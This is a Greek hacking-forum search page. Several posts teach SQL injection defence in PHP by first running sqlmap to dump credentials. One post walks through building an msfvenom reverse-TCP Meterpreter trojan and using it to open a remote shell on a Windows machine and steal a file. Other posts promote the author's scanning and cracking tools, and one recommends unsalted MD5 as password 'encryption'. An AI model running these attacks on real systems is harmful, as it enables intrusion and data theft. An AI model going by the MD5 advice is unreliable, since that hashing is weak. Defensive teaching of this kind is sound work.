Μετάβαση στο περιεχόμενο

Αναζήτηση στην κοινότητα

Εμφάνιση αποτελεσμάτων για τις ετικέτες 'greekhacking'.

  • Αναζήτηση με βάση τις ετικέτες

    Πληκτρολογήστε τις ετικέτες και χωρίστε τες με κόμμα.
  • Αναζήτηση με βάση τον συγγραφέα

Τύπος περιεχομένου


Ενότητες

  • GreekHacking
    • Κανόνες & Ανακοινώσεις
    • Καλωσόρισμα νέων μελών
    • Προτάσεις / Βελτιώσεις
    • Νέα σχετικά με το Hacking/Security
    • Ασφάλεια & Προστασία Δεδομένων
    • Εκτός Θέματος
  • Leaks
    • Hacking Tutorials
    • Anonymity & Privacy / Ανωνυμία και Προστασία Προσωπικών Δεδομένων
    • Προγράμματα για Hacking / Hacking Programs
    • Cracking Οδηγοί & Πληροφορίες
    • Βιβλία σχετικά με το Hacking
    • Προγράμματα - High Quality downloads
    • E-Books
    • XXX Movies

Categories

  • Ορολογίες
  • Hacking για αρχάριους
  • Hacking για προχωρημένους
  • Mobile Hacking
  • Cracking Tutorials
  • Hacking Computers
  • Hacking Tutorials στα Αγγλικά
  • Tutorials for hacks
  • Διάφοροι Οδηγοί
    • Οδηγοί σχετικά με τα Linux
    • Οδηγοί για υπολογιστές
    • Οδηγοί σχετικά με τα Mac
    • Οδηγοί για κινητά
  • Hacking Tutorials στα Αγγλικά Copy

Categories

  • Hacking
  • Ιστοσελίδες/Server
  • Hardware
  • Windows

Βρείτε αποτελέσματα...

Βρείτε αποτελέσματα που...


Ημερομηνία δημιουργίας

  • Start

    End


Τελευταία ενημέρωση

  • Start

    End


Φιλτράρισμα με βάση τον αριθμό των...

  1. Την προηγούμενη φορά σας έδειξα πως να αποτρέπετε μία επίθεση SQLi. Αυτήν την φορά θα σας δείξω πως να κρυπτογραφήσετε τους κωδικούς στην βάση σας, σε περίπτωση που κάποιος επιτήδειος βρει κενό ασφαλείας και μπει στην βάση σας. Αρχικά θα σας δείξω τον κώδικα παρακάτω. Δεύτερον, θα σας δείξω δοκιμή και πριν ο κωδικος γίνει Encrypted αλλά και μετά. Πάμε να δούμε. Αυτός λοιπόν είναι ένας απλός κώδικας για Register form σε php. Δώστε βάση στα $passwd = ($_POST['password']); Το post username το αφήνουμε στην άκρη. Εμείς θα ασχοληθούμε με το passwd και το cpasswd. Τα confirm password καλό θα ήταν να τα βάζετε. Εδώ βλέπουμε την φόρμα εγγραφής λοιπόν, με username = test και passwd and cpasswd = test επίσης. Πάμε λοιπόν να δούμε αν κάνουμε εγγραφή με αυτόν τον κώδικα, πως εμφανίζεται στην βάση και πως θα το δει ο χάκερ όταν σας πάρει πρόσβαση. Κλασικά βλέπει τα στοιχεία. test:test. Πως όμως θα τον κάνουμε να προβληματιστεί λίγο και να μπει σε μία διαδικασία Brute Force έτσι ώστε να αποκρυπτογραφήσει το hash? Το πρώτο πράγμα που θα κάνει ο χάκερ θα είναι να πάει σε ένα online hash decryptor, τότε θα αναγκαστεί να κάνει brute force και να τρέξει wordlist με την ελπίδα να βρει το hash. Αυτός είναι ο λόγος που πρέπει να βάζουμε αρκετά δύσκολους κωδικούς και κατά προτίμηση να είναι generated. Αλλιώς το encryption δεν υπάρχει λόγος να το κάνεις. Αφού λοιπόν καταλάβατε τον λόγο που πρέπει να βάζετε σκληρούς κωδικούς, συνεχίζω. Αυτός είναι ο κώδικας που θα μας βοηθήσει να κρυπτογραφήσουμε τα password. Πάμε λοιπόν και προσθέτουμε πίσω από τις παρενθέσεις ένα "md5", έτσι ώστε να έχουμε md5 hash encryption. Εδώ μία προσοχή παρακαλώ. Αν έχετε βάλει και cpasswd για επαλήθευση κωδικού, πρέπει να προσθέσετε και εκεί md5 διότι αλλιώς δεν θα διαβάζει τους κωδικούς ίδιους έτσι ώστε να αντιστοιχούν γιατί ο ένας δεν θα διαβάζεται με hash. Ξανά λοιπόν πάμε και κάνουμε εγγραφή. username = mata, passwd and cpasswd = 123. Πατάμε register και πάμε να δούμε πως φαίνεται στην βάση. Encrypted. Ο κωδικός πλέον είναι κρυπτογραφημένος και ο χάκερ θα δυσκολευτεί να τον σπάσει (σε περίπτωση που βάλουμε σκληρό κωδικό και όχι το 123 για το συγκεκριμένο παράδειγμα) Πάμε να δούμε τώρα αυτό που σας έλεγα πριν με το online hash decryptor. Κάνουμε αντιγραφή το hash Πάμε στο https://hashes.com/en/decrypt/hash και κάνουμε paste το hash μας. Αυτό θα είναι το πρώτο πράγμα που θα κάνει ο χάκερ για να δει αν υπάρχει online το hash. πατάμε submit. Ο δρόμος για τον χάκερ είναι και πάλι ανοιχτός διότι δεν βάλαμε κάποιον σκληρό κωδικό. Βρήκε τον κωδικό 202cb962ac59075b964b07152d234b70:123 Πάμε να δούμε όμως τι βγάζει όταν βάλουμε έναν δύσκολο κωδικό. Αυτην την φορά θα κάνω ξανά εγγραφή, θα βάλω τον κωδικό "greek_hacking_is_the_best_greek_forum", θα κάνω copy πάλι το hash από την βάση, και θα έρθω πάλι εδώ να δούμε πως το δείχνει και αν το βρίσκει. Βάλαμε λοιπόν το hash που αντιστοιχεί στον κωδικό greek_hacking_is_the_best_greek_forum και βλέπουμε πως δεν το βρίσκει ένα online hash decryptor. Οπότε ο χάκερ θα αναγκαστεί να κάνει brute force και να τρέξει wordlist.
  2. Καλησπέρα. Ένα διαφορετικό θέμα για σήμερα με σχέση το Cyber Security και την ασφάλεια συστημάτων διότι είναι πολύ σημαντικό να γνωρίζουμε και την ασφάλεια, παρά να ξέρουμε μόνο να κάνουμε επιθέσεις. Σήμερα σε αυτόν τον οδηγό θα πούμε πως μπορούμε να προστατέψουμε την Βάση δεδομένων μας και τα απόρρητα αρχεία από κάποιον κακόβουλο χάκερ με επίθεση SQL INJECTION σε POST method. Όσοι θέλετε να μάθετε και πως γίνεται μία τέτοιου είδους επίθεση, υπάρχουν κάποιοι οδηγοί στο φόρουμ. Ας μπούμε όμως στο θέμα μας. Το παράδειγμα θα σας το δείξω σε μία δική μου manual ιστοσελίδα η οποία τρέχει local με την βοήθεια του xampp. Να πω λοιπόν πως άνοιξα έναν apache server και ένα phpmyadmin από πίσω για database. (db = egasiasxol, host = localhost, table = users, columns = username-password). Μπορείτε να δείτε τους κώδικες html και php παρακάτω. Τι έχουμε στον κώδικα; Στον κώδικα έχουμε απλά input στην html τα οποία είναι textboxes για τον χρήστη έτσι ώστε να εισχωρίσει το username και το password και άλλο ένα input το οποίο είναι type=submit δηλαδή button έτσι ώστε να γίνει η σύνδεση σε περίπτωση που είναι σωστά τα στοιχεία (Όλα αυτά βρίσκονται σε ένα form στο οποίο χρησιμοποιούμε method=post. Στον php κώδικα επιτρέπουμε στην βάση να επικοινωνήσει μαζί του. Τι σημαίνει αυτό; να διαβάζει μέσα από την βάση το username και το password έτσι ώστε ελέγξει αν είναι σωστά τα στοιχεία για να πάρει πρόσβαση ο χρήστης στο λεγόμενο Dashboard, ή να μην πάρει. $sql = "select * from users where username='$user' and password='$passwd'"; Πάμε λοιπόν να δούμε που είναι το λάθος σε αυτόν τον κώδικα. Η απάντηση είναι πως δεν υπάρχει κάποιο λάθος, απλώς δεν υπάρχουν φίλτρα και έτσι ο χάκερ μπορεί να πάρει πρόσβαση στο σύστημα επειδή ο κώδικας μας δεν έχει φιλτράρει τα Symbols τα οποία μπορεί να χρησιμοποιηθούν ( ' κ.τ.λ). Πάμε λοιπόν να δούμε Live την επίθεση αλλά και την ασφάλεια. Πρώτα θα ξεκινήσουμε από την επίθεση. Ανοίγουμε το Burpsuite στο Linux μας, ανοίγουμε και έναν browser στον οποίο έχουμε βάλει σωστά τα proxies για να επικοινωνούν με το burp. proxy -> intercept Να προσέξετε το intercept να είναι στο "ON". Βάζουμε λοιπόν κάποια τυχαία cedentials με ένα "αυτάκι" στο τέλος και στο username και στο password. (π.χ username' , password'). Αφού πατήσουμε το κουμπί σύνδεση το burpsuite θα μας εμφανίσει κάποια αποτελέσματα με POST method. Πατάμε δεξί κλικ στα αποτελέσματα και επιλέγουμε copy to file έτσι ώστε να τα αποθηκεύσουμε σε αρχείο. Αφού πατήσουμε ονομάσουμε το αρχείο (στην περίπτωσή μας grhacking) και πατήσουμε save έτσι ώστε να αποθηκεύσει το αρχείο στο path το οποίο έχουμε επιλέξει, ανοίγουμε το sqlmap το οποίο είναι ένα απίστευτο κατά την γνώμη μου tool το οποίο θα μας βοηθήσει να κάνουμε αυτοματοποιημένα την επίθεση sql injection. Ανοίγουμε sqlmap και γράφουμε "sqlmap -r (για το αρχείο) grhacking --dbs (για να βρει το database) sqlmap -r grhacking --dbs POST parameter 'username' might be injectable (Πιθανή Βάση mysql). Για όσους δεν καταλάβατε βρήκε ευάλωτη την βάση μας κάτι το οποίο είναι πάρα πολύ σημαντικό. Γιατί; πάμε να δούμε παρακάτω. Αφού λοιπόν γράψουμε κάποιες εντολές για να βρούμε τα κατάλληλα tables και columns έτσι ώστε να τα κάνει dump, βλέπουμε τα αποτελέσματα... Με τα οποία ο χάκερ θα χαρεί αλλά εμείς θα κλαίμε... διότι με αυτά τα στοιχεία παίρνει πρόσβαση στο dashboard. username: mata , password = greekhacking Πάμε λοιπόν να δούμε πως μπορούμε να προστατέψουμε τα προσωπικά μας δεδομένα από αυτήν την επίθεση. Ξαναπάμε στον κώδικα τον οποίο έδειξα σε προηγούμενο screenshot, και βάζουμε τα φίλτρα. Θα σας εξηγήσω αφού δείτε την εικόνα. Εκεί που έχω βάλει τα slashes είναι το λεγόμενο comment το οποίο ο κώδικας δεν το βλέπει. Οπότε το προσπερνάμε. Δημιουργούμε ένα νέο variable το οποίο είναι το $userprevent και μέσα σε αυτό βάζουμε το φίλτρο mysqli_real_escape_string. Στις παρενθέσεις είναι το connection που το έχω ορίσει ως $conn και το $usr το οποίο έχω ορίσει για το POST του username πιο πάνω "$usr = $_POST['username'];" Κάνουμε το ίδιο και για το password. Αφού λοιπόν γίνει αυτό, το αμέσως επόμενο βήμα είναι να εφαρμοστούν τα variables για να δουλέψουν τα φίλτρα για να προστατευτεί η βάση μας. τα εφαρμόζουμε πηγαίνοντας στο $sql variable που έχουμε ορίσει για την επικοινωνία των στοιχείων με το POST method στα textbox τα οποία θα πληρκτρολογήσει ο χρήστης. Σας το έχω δείξει και με βελάκια. (Μπορείτε να δείτε τις διαφορές στο πάνω σκριν που έδειξα με κώδικα και σε αυτό το σκριν). Πάμε λοιπόν να ξανακάνουμε επίθεση για να δούμε τι θα γίνει πάλι. Όπως βλέπουμε το sqlmap δεν μπορεί να ανταποκριθεί διότι έχουμε πλέον βάλει φίλτρα και μας πετάει POST parameter does not seem to be injectable. [WARNING]. Και εννοείτα παρακάτω μας πετάει CRITICAL error και μας απορρίπτει. Αυτός ήταν ο οδηγός για το πως μπορείτε να προστατευτείτε από μία επίθεση SQL INJECTION σε POST method. Κάποια στιγμή θα βγάλω και για το πως να προστατευτείτε από SQL INJECTION επίθεση σε GET method. Ευχαριστώ όσους διαβάσατε μέχρι το τέλος, ελπίζω να μάθατε κάτι από εμένα και ελπίζω να το έγραψα και να το έδειξα όσο πιο αναλυτικά μπορούσα. Καλό Hacking (ηθικό φυσικά). 🙂
  3. Επειδή ό,τι λέω το κάνω κάποια στιγμή, σας είχα πει όταν έκανα τον οδηγό για το POST METHOD ότι θα κάνω και οδηγό για το πως να προστατευτούμε από ένα SQL INJECTION attack σε GET METHOD. Τι εννοούμε GET? Εννοώ η πληροφορία που Παίρνω και όχι που δίνω στον Server όπως είναι το POST με login, register κ.τ.λ. Όπως έχουμε πει με τα google dorks inurl:.php?id=1 , που δίνουμε στην google να καταλάβει ότι θέλουμε να ψάξουμε στην αναζήτη ΜΟΝΟ ιστοσελίδες και σελίδες που έχουν ΜΟΝΟ παράμετρο ID στο URL τους... Ε αυτό θα κάνουμε σήμερα. Θα μάθουμε πως να μην τρώει MYSQL ERROR η σελίδα όταν βάζουμε το quote " ' " δίπλα από την παράμετρο. Π.Χ id=1' . Αφήνω λοιπόν την πολλή εξήγηση και πάμε να μπούμε στο ψητό. Εδώ του λέμε να πάρει το ID το οποίο το έχουμε ορίσει και user_id και μετά φτιάχνουμε ένα query με users όπου id=$user_id. Πρώτα απ' όλα βλέπουμε τον κώδικά μας. Έχουμε χτίσει ένα table γράφοντας κώδικα HTML ΜΕΣΑ ΣΤΗΝ PHP, και με τα $row που έχουμε ορίσει πιο πάνω από το foreach και $sql_run, του δείχνουμε να καταλάβει πως θέλουμε στα tables να εμφανίζετε ΚΑΘΕ χρήστης μέσα από την βάση. (θα δείτε παρακάτω σε screenshot). Ακριβώς από κάτω από αυτά τα $row, δίνουμε άλλο ένα row και το πιο σημαντικό γι αυτό το topic. Του λέμε όταν πατηθεί το «κουμπί» EDIT που θα υπάρχει στο table, να μας ανακατευθύνει ( href ) στην σελίδα edit.php (που έχουμε φτιάξει) αλλά όχι μόνο εκεί, αλλά και στην παράμετρο. Δηλαδή για παράδειγμα θέλουμε να κάνουμε edit τα στοιχεία του χρήστη MATA ο οποίος mata μέσα στην βάση σαν ID έχει τον αριθμό 64. Οπότε θα γράψεις στο url edit.php?id= (Και τον αριθμό του id του χρήστη μέσα στην βάση) $row['id']. Προφανώς το ID αν δεν ξέρετε πως το διαβάζει μέσα από την βάση, το διαβάζει διότι κάναμε πριν query "SELECT * FROM users". Δηλαδή; Επέλεξέ τα όλα (*) από το table users. Και αμέσως μετά τρέξαμε το $sql_run = mysqli_query($conn, $sql) (το sql ήταν το variable που είχαμε ορίσει για το query ( $sql = "SELECT * FROM users ). Εδώ έχουμε τα tables που είπα πρίν. Και με ID χρήστη τον αριθμό 64. (όσοι χρήστες υπάρχουν μέσα στην βάση τόσο θα αυξάνεται η λίστα). Πατάμε λοιπόν edit να δούμε τι γίνεται στο url. Όπως βλέπουμε, το URL δείχνει τον αριθμό 64 στην παράμετρο ID. Αυτό γίνεται επειδή πρίν στο href βάλαμε το $row['id'] όπως σας εξήγησα παραπάνω. Πάμε λοιπόν να βάλουμε ένα QUOTE στην παράμετρο να δούμε πως και ΓΙΑΤΙ αντιδράει η ιστοσελίδα με ERROR. Όσοι έχετε πάει να κάνετε SQL INJECTION επίθεση σίγουρα έχετε παρατηρίσει κάποιο τέτοιο error. To error αυτό ονομάζεται ERROR-BASED SQL INJECTION. Error based ονομάζεται όταν το quote (') «σπάει» το Syntax. Γι αυτό και γράφει "You have an error in your SQL Syntax". Πάμε να το εκμεταλλευτούμε αυτό; Θα είναι πανεύκολο γιατί ο απρόσεκτος Developer ξέχασε να βάλει τα φίλτρα στον κώδικά του οπότε εγώ σαν κακόβουλος θα μπορέσω να τον εκμεταλλευτώ... Πάμε και γράφουμε λοιπόν sqlmap -u "http://<target>.com/edit.php?id=1" --dbs Το --dbs είναι για να βρεί τις βάσεις δεδομένων. Μας πετάει cookies και πατάμε Y για να τα χρησιμοποιήσουμε. Πόσο ευχάριστο για εμάς ε; Εδώ μας λέει ΄΄οτι ΠΙΘΑΝΟΝ η παράμετρος ID να είναι ευπαθής και η ΠΙΘΑΝΗ Database είναι MySQL. Θέλουμε να κάνουμε skip τα άλλα payload tests για άλλες dbmses? Και πατάμε Yes. Διότι δεν χρειαζόμαστε κάτι άλλο. Τι είπαμε πριν; Error-based. Πάμε παρακάτω τα εξήγησα πρίν αυτά. Η παράμετρος ID είναι ευπαθής. Θές να τσεκάρεις κι άλλες παραμέτρους; (Δεν χρειάζεται οπότε NO) Τι κακό τον βρήκε....... Αν θυμάστε από τον προηγούμενο οδηγό η database λεγόταν ergasiasxol. Πάμε να μπούμε σε αυτήν γράφοντας sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol --tables -D ergasiasxol για να μπούμε σε αυτήν την βάση, και το --tables για να μας εμφανίσει τα tables. Βλέπουμε πως υπάρχει το table users. Οπότε πάμε να μπούμε σε αυτό και να δούμε τα columns. sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol -T users --columns Εδώ βλέπουμε τα columns. Εμείς χρειαζόμαστε μόνο το username και το password. Πάμε να τα κάνουμε DUMP για να τα δούμε. sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol -T users -C username,password --dump Φτάσαμε στον στόχο μας. Βέβαια ο κωδικός είναι σε κρυπτογράφηση md5 έχω εξηγήσει εδώ πως το κάνουμε αυτό, οπότε απλά παίρνουμε το hash και το σπάμε (αν δεν υπάρχει σε online tool προτείνω crunch για να φτιάξετε λίστα). ############################################################ ΠΡΟΣΤΑΣΙΑ ########################################################### Πάμε λοιπόν τώρα να δούμε πως μπορούμε να προστατευτούμε από αυτήν την επίθεση. Πρέπει να πάμε ξανά στον κώδικά μας και να βρούμε που είναι το variable που έχουμε ορίσει για την $_GET['id']; . To user_id είναι το variable που έχουμε ορίσει για την GET. Το filtered_userid variable υπάρχει για να το προσθέσουμε μετά στο id=$filtered_userid στο query. Επίσης στο variable filtered_userid γράφουμε το εξής filter_var($user_id, FILTER_SANITIZE_NUMBER_INT); To filter_var είναι συνάρτηση της php η οποία χρησιμοποιείται για το φιλτράρισμα της μεταβλητής (variable). Στην περίπτωσή μας θέλουμε να φιλτράρουμε το variable $user_id που είναι της GET -> id=$row['id'] -> id=64 (στην προκειμένη περίπτωση). To FILTER_SANITIZE_NUMBER_INT αποτρέπει χαρακτήρες όπως το QUOTE. Πάμε λοιπόν τώρα να δούμε αν η σελίδα μας αντιδράει σε error. Απολύτως καμία αντίδραση. Πάμε να κάνουμε πάλι επίθεση λοιπόν CRITICAL. Δεν μας αφήνει να βρούμε βάση. Πάμε να δοκιμάσουμε και με risk και level και με v 6 Πάλι critical. Οπότε είμαστε καλυμμένοι. Θα βγάλω και οδηγό για το πως να προστατευτούμε από επίθεση XSS (CROSS SITE SCRIPTING) κάποια στιγμή. Be safe. 😀
  4. Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe -p = payload -LHOST: localhost LPORT: local port -f: file Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό. Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole) Αφού ανοίξει πληκτρολογούμε use multi/handler Αμέσως μετά βάζουμε payload. set PAYLOAD windows/x64/meterpreter/reverse_tcp Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας. Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>". Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>". Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο. http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom) και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση (Συγγνώμη αν δεν πίασει το gif) Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε". Για να το κάνουμε αυτό πατάμε download greekhacking.txt Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο Ακριβώς το ίδιο! Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη --------------------------------------------------------------------------------------------------------------- Buy Me A Coffee: https://www.buymeacoffee.com/mataroot Συνδρομή: https://www.buymeacoffee.com/mataroot/membership Discord Server: https://discord.gg/aStuy26X
  5. FuzzyFa v0.0.1 Το fuzzyfa είναι ένα πρόγραμμα το οποίο σε βοηθάει για Directory scanning. Δηλαδή ψάχνει dirs σε μία ιστοσελίδα και σας τα εμφανίζει στο terminal. Είναι αρκετά βοηθητικά τα dir scannings για κάποιον που θέλει να βρει παραπάνω πληροφορίες σε μία ιστοσελίδα (για εμένα τουλάχιστον). ΠΑΡΑΔΕΙΓΜΑΤΑ ΤΟΥ ΠΡΟΓΡΑΜΜΑΤΟΣ Όπως μπορείτε να δείτε στην πρώτη εικόνα είναι το άνοιγμα του προγράμματος. Δώστε ιδιαίτερη προσοχή στο "Please enter the url like this: http://example.com/ " αλλιώς δεν θα σας τρέξει σωστά το πρόγραμμα. Ένα παράδειγμα βλέπετε στην δεύτερη εικόνα με την ιστοσελίδα του greekhacking. "http://greekhacking.gr/" Όπως βλέπουμε μας λέει ότι βρήκε δύο Dirs. Ας πάμε στην δεύτερη. Αφού εμείς βάλαμε το site, αμέσως μετά προσθέσαμε ένα slash "/". Με αυτό ουσιαστικά δίνουμε στο πρόγραμμα να καταλάβει που θέλουμε να κάνουμε dir scanning. Αν για παράδειγμα γράφαμε "http://greekhacking.gr/applications/" θα μας έκανε σκαν μετά από το δεύτερο slash που βάλαμε. Δηλαδή ότι υπάρχει μετά το "/applications/". Να προσθέσω πως γίνονται και updates και κάθε φορά που θα αλλάζω κάτι μέσα από το πρόγραμμα θα σας το ζητάει. Δείτε στην παρακάτω εικόνα. Αφού γίνει το update, πρέπει να ανοίξουμε και πάλι το πρόγραμμα έτσι ώστε να γίνουν οι αλλαγές. INSTALL Το install σας το έχω κάνει εύκολο, διότι έχω φτιάξει το αρχείο setup.py, το οποίο αν το τρέξετε σας κατεβαίνουν όλα τα απαραίτητα. Και ό λόγος που δεν έχω μόνο το requirements.txt είναι επειδή όσοι δεν έχουν την pip και τρέξουν το setup, θα τους κατέβει και η pip. Όσοι την έχετε μπορείτε να τρέχετε και το requirements.txt (στο setup.py τρέχουν όλα μαζί). Αφού ολοκληρωθεί το setup, θα σας κάνει ερώτηση το πρόγραμμα αν θέλετε να το ανοίξετε. Καλή χρήση 🙂 Download: https://github.com/MataGreek/fuzzyfa git clone https://github.com/MataGreek/fuzzyfa.git VIRUSTOTAL https://www.virustotal.com/gui/file/f74c553ef1f457dbd4bcd755d53dc9cc3aeb97c765f7074477a68d405f1eddc2?nocache=1
  6. [Greekhacking program V1.1.8] ######################## Νέα ενημέρωση στο πρόγραμμά μου. Έκδοση 1.1.8. Δεν έχω κάνει τρελή αλλαγή απλά το βρήκα καλό να προσθέσω κάτι, συγκεκριμένα στο Password Generator. Όσοι έχετε το πρόγραμμά μου γνωρίζετε πως όταν ανοίγει σας ζητάει να επιλέξετε έναν αριθμό για να ανοίξετε το αντίστοιχο πρόγραμμα. Στο νούμερο 4 λοιπόν που βρίσκεται το Password Generator έγιναν αλλαγές. Τι άλλαξε; ######## Το Password Generator για όσους δεν ξέρετε σου κάνει generate έναν τυχαίο κωδικό με σύμβολα, κεφαλαίους, μικρούς χαρακτήρες και αριθμούς έτσι ώστε να είναι ασφαλής. Όμως επέλεξα να το κάνω ακόμα πιο ασφαλή. Έβαλα το πρόγραμμα να ρωτάει αν θέλετε να κρυπτογραφήσετε τον κωδικό που σας έκανε generate γρήγορα και απλά. Απλά απαντάτε ένα "Yes" και θα σας βγάλει τον κωδικό που σας δώθηκε κρυπτογραφημένο. Για περισσότερες πληροφορίες και εξήγηση στείλτε μήνυμα Πάρτε ένα παράδειγμα στην παρακάτω εικόνα. Κατεβάστε το πρόγραμμα εδώ: https://github.com/MataGreek/greekhacking VIRUS TOTAL ΕΧΩ ΒΑΛΕΙ ΣΤΗΝ ΠΡΩΤΗ ΜΟΥ ΑΝΑΡΤΗΣΗ ΟΤΑΝ ΠΑΡΟΥΣΙΑΣΑ ΤΟ ΠΡΟΓΡΑΜΜΑ. ΠΑΡΑΚΑΛΩ ΤΣΕΚΑΡΕΤΕ ΤΗΝ
  7. Καλησπέρα φόρουμ! Σήμερα είμαι αρκετά χαρούμενος γιατί έγινε κάτι που δεν περίμενα να γίνει. Το πρόγραμμα αναβαθμίστηκε. Τι άλλαξε; ####### Πλέον το πρόγραμμα σας δείχνει το Version που ήδη έχετε και το Version που πρέπει να έχετε. Δηλαδή αν το πρόγραμμα είναι up to date. Αν δεν είναι up to date, σας ρωτάει αν θέλετε να κάνετε την αναβάθμιση που είναι διαθέσιμη. Αν εσείς λοιπόν επιλέξετε Ναι, προφανώς θα γίνει το Update. Το έψαχνα πριν καν φτιάξω το πρόγραμμα για το πως μπορώ να κάνω και τους υπόλοιπους να δέχονται τα updates, και τελικά έγινε έτσι όπως ήθελα. Μπορείτε να το χρησιμοποιήσετε ελεύθερα! Σχετικά με το Virus Total έχω ανεβάσει εικόνα στο προηγούμενο θέμα που είχα φτιάξει για το πρόγραμμα. Αν δεν το έχετε δει, παρακαλώ πηγαίντε και δείτε το για να καταλάβετε την χρήση του προγράμματος: Download: https://github.com/MataGreek/greekhacking
  8. [CYBER SECURITY && ETHICAL HACKING] ################################# Ίσως το καλύτερο πρόγραμμα που έχω φτιάξει. Είναι ένα πρόγραμμα σε όλα. Τι εννοώ; Ο χρήστης έχει το δικαίωμα να επιλέξει τι θέλει να χρησιμοποιήσει από όλα τα προγράμματα που έχω φτιάξει μαζί. Όπως ακριβώς βλέπουμε στην πρώτη εικόνα. ####################################### 1 ==> Subdomain Finder 2 ==> Admin Login Finder 3 ==> Port Scanner 4 ==> Password Generator 5 ==> Proxy List 6 ==> MD5 Cracker 0 ==> Exit. ####################################### Χρήση ####### Η χρήση του είναι επίσης πολύ απλή. Απλά επιλέγουμε τον κατάλληλο αριθμό που αντιστοιχεί με το πρόγραμμα που θέλουμε να χρησιμοποιήσουμε και έπειτα ακολουθούμε τις οδηγίες των προγραμμάτων. Πρέπει αναγκαστικά να έχετε κατεβασμένη στον υπολογιστή σας την Python για να το χρησιμοποιήσετε. INSTALL ########## cd greekhacking pip install -r requirements python greekhacking.py Download ######### Mediafire: https://www.mediafire.com/.../bqti1.../greekhacking.rar/file GitHub: https://github.com/MataGreek/greekhacking
  9. Καλησπέρα στον κόσμο του φόρουμ μας Σήμερα θα ήθελα να σας παρουσιάσω ένα πρόγραμμα που έφτιαξα με την γλώσσα Python και αυτό είναι ένα από Port Scanner. Τι κάνει το Port Scanner? Σκανάρει για ανοιχτές πόρτες ή θύρες (όπως θέλετε πείτε το) ενός Website. Πάμε να δούμε πως λειτουργεί λοιπόν. Αρχικά θα σας βάλω σε Screenshot το σκαν που έκανε το VirusTotal για να σας επαληθεύσω ότι δεν έβαλα μέσα κάποιον ιό. Ωραία. Τώρα που το επαληθεύσαμε πάμε να ξεκινήσουμε. Για αρχή, να πω ότι ο οδηγός είναι πάρα πολύ απλός και δεν χρειάζεται να κάνετε απολύτως τίποτα παρά μόνο να γράψετε αυτήν την εντολή "python3 GHPortScanner.py" Αφού όμως έχετε μπει στους σωστούς φακέλους οι οποίοι είναι "cd GHPortScanner/" και "cd GHPortScanner-v1.1" Με το που ανοίξει το πρόγραμμα θα σας εμφανίσει το "Enter the Host Here:" Εσείς εκεί θα βάλετε το Website το οποίο θέλετε να σκανάρετε. (Όχι την IP, βάλτε απλά το όνομα της ιστοσελίδας) Ας πάρουμε παράδειγμα το φόρουμ μας. Βλέπουμε ότι μας έχει βρει την IP της ιστοσελίδας που βάλαμε η οποία είναι 172.67.177.36 και περιττώ να πω ότι εδώ υπάρχει ένα προβληματάκι το οποίο μακάρι να το έχω λύσει στο επόμενο Version του προγράμματος... Είναι ΑΡΚΕΤΑ αργό στο να βρεί τα αποτελέσματα ανοιχτών Port. Συγγνώμη γι αυτό θα βρω τον τρόπο. Οπότε... Will take sometime, go get a coffee Βλέπουμε ότι βρήκε ανοιχτή την πόρτα 80. Εκεί το σταμάτησα γιατί το άνοιξα μόνο και μόνο για να σας δείξει πως λειτουργεί. Αν θέλετε να βγείτε από το πρόγραμμα, πατήστε απλά CTRL+C και αμέσως θα σας εμφανίσει την λέξει Exiting...... Που σημαίνει ότι το πρόγραμμα τερματίζεται. Το πρόγραμμα μπορείτε να το κατεβάσετε από το Github αλλά θα σας έχω και αρχείο στο MediaFire. Ευχαριστώ Για οποιοδήποτε πρόβλημα προκήψει, μην διστάσετε να γράψετε σχόλιο. Mediafire Download: https://www.mediafire.com/file/lkp6zrh1iodn7v9/GHPortScanner.zip/file Github Download: https://github.com/MataGreek/GHPortScanner command για να το κατεβάσετε σε Linux... git clone https://github.com/MataGreek/GHPortScanner.git ΠΡΟΣΟΧΗ: ΝΑ ΒΑΖΕΤΕ ΤΟ ΣΩΣΤΟ HOST NAME ΚΑΙ ΝΑ ΕΧΕΤΕ ΣΥΝΔΕΣΗ ΤΟ ΙΝΤΕΡΝΕΤ ΑΛΛΙΩΣ ΤΟ ΠΡΟΓΡΑΜΜΑ ΔΕΝ ΘΑ ΛΕΙΤΟΥΡΓΗΣΕΙ 